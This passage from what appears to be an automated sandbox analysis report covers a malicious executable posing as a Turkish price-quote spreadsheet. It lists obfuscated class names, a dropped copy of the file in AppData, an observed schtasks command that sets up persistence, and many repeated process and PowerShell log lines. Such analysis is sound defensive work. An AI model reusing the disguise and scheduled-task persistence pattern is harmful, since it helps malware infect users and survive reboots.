Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, Q9VkWOKC4Ua0fHmFDp.cs High entropy of concatenated method names: 'NSR1Ft6BRM', 'JpE1M5GHPK', 'ysv1jPoYGI', 'r1T1Xmnh3A', 'Xgr1Leg6T8', 'jmd1HKPLIs', 'IBC1RFjwTh', 'Cq01gVmDBW', 'lnB1J20H6r', 'GO117CxStT'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, eSH1hNhtZBn7B5GLJb.cs High entropy of concatenated method names: 'Dispose', 'fqpb6fIfLP', 'GsswcLQbAy', 'yf0kkJkAAx', 'TXbbTux2vq', 'CpxbzldOjV', 'ProcessDialogKey', 'j0swimftTc', 'DaOwbjYT61', 'tE6wwhnLob'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, Q9xghsc13POXL59hd36.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'u85Bu5i7xO', 'aQ3BZdntuW', 'gMCBAHdROw', 'NWvBvlaLoG', 'tLrB5wuG4r', 'TdsBNjqoSn', 'wK2BCSJGZR'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, zn3NCY79dmYgsr4fSN.cs High entropy of concatenated method names: 'ToqSMSZIGS', 'pQZSjTJ0kx', 'Jb2SXy7jOJ', 'duTSLAvi6C', 'rAVSHYxNFi', 'UOtSRC6voH', 'gU9SgrU4J8', 'uK4SJUDQyE', 'nCUS7KNbSZ', 'YprSxY92N0'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, LVnkPGSGbiRthtxoiS.cs High entropy of concatenated method names: 'irnXIZYoL9', 'dp8XnmroBs', 'XoNXEALpOm', 'qyqXeXiqKC', 'aBnXD8KkZV', 'd2FXpv33Kf', 'YKjXlMd3Ur', 'i0EXSwkDiE', 'G2kXdApiJt', 'kMeXBXF6Qn'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, RTVPJ8XYj41c8rxLq2.cs High entropy of concatenated method names: 'G63D8hWHGw', 'giDDopx3SQ', 'RvrDuWo39b', 'BFsDZlpW9e', 'B2FDcH77Ax', 'EdpDy49NMl', 'qClDUoXvQR', 'lp7D2fi1ny', 'SrGDQTMGOU', 'H4RDV3XSUt'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, gIg4FK4ptc3iNx3d5t.cs High entropy of concatenated method names: 'wRElPNnvqU', 'nXVlTo7h9R', 'CiOSiKnHce', 'oxhSbPdQ88', 'gpil9IwqTi', 'LjsloLXQ0p', 'onflrkBGq0', 'DEHlupGW9J', 'AnSlZkakXo', 'z34lAr1JSd'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, igcy6eyM1j3LjtvZJ4.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'dJew6m5Ba2', 'wp1wT7a9Wc', 'RkpwzEwTMa', 'rkh1iChxIg', 'b351bvRT35', 'K3C1w8bsGs', 'HEb11Qoron', 'iCqwtQSsDopRtO3goQM'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, PmlP9aQ2SI5idMhMtL.cs High entropy of concatenated method names: 'IZQSmpfMMR', 'GaiScNwT1T', 'CYYSysn0PK', 'GaHSUjr1s5', 'FKZSutFthS', 'J3SS250VYq', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, iuk0KnTfCYRw9jb2D8.cs High entropy of concatenated method names: 'pWRdbJCrUT', 'QmWd125csB', 'OBHdhr8aX5', 'UNrdM7wArk', 'a9cdjGm5Gp', 'MMAdLKGEMy', 'g2OdHyl2h5', 'QNPSC5RCem', 'zHTSPfh04g', 'KFgS6AYAgO'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, RaXMABvfFfu6o5SOSX.cs High entropy of concatenated method names: 'CqGttgN3h', 'G0uIOCG0a', 'FRknrvQ2N', 'tKtff0t4c', 'w5te3ZZfT', 'AuMYkaQXq', 'VSEyD3pMEtBHmcH8KS', 'HYycmCu58Ub9AFt5xv', 'rwbSRnjcp', 'obABqbI0S'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, we3YK7qH5g3FHYcDWm.cs High entropy of concatenated method names: 'ToString', 'oIBp927gdn', 'LJXpcSgOyA', 'yImpyId8KS', 'DPmpUCiFU5', 'EX1p2uCmvC', 'EYPpQJX7tM', 'PNRpVdEQjg', 'm35pGrCgRZ', 'ux6psQEZDT'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, hqmIe8lu5adE3g7l3p.cs High entropy of concatenated method names: 'B9jHFVF6Ol', 'ueuHj4J5PE', 'SkBHLyjcAS', 'kw8HRWMp7w', 'hsjHgHs9YU', 'wwKL5A6URS', 'ucaLNlKJhP', 'PUXLCYmvxJ', 'BOALPuOyG8', 'wYML65wlaA'
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3c785f0.2.raw.unpack, gWIJvlOyuCsqmNZsPS.cs High entropy of concatenated method names: 'UrmbRKQ5sU', 'AopbgQdIA8', 'SKVb70Hurd', 'fIvbxfBe5i', 'FEfbD2yc3T', 'XMZbpwqZf7', 'Dspcn65mXoymH9kVEk', 'yMMNt9JF3SOVneNc1L', 'PWnbbVuFpB', 'obvb10b9sG'
Source: 10.2.OnCgVRIhY.exe.2d0e8fc.0.raw.unpack, JK.cs High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Drops PE files
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe File created: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp1B98.tmp"

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
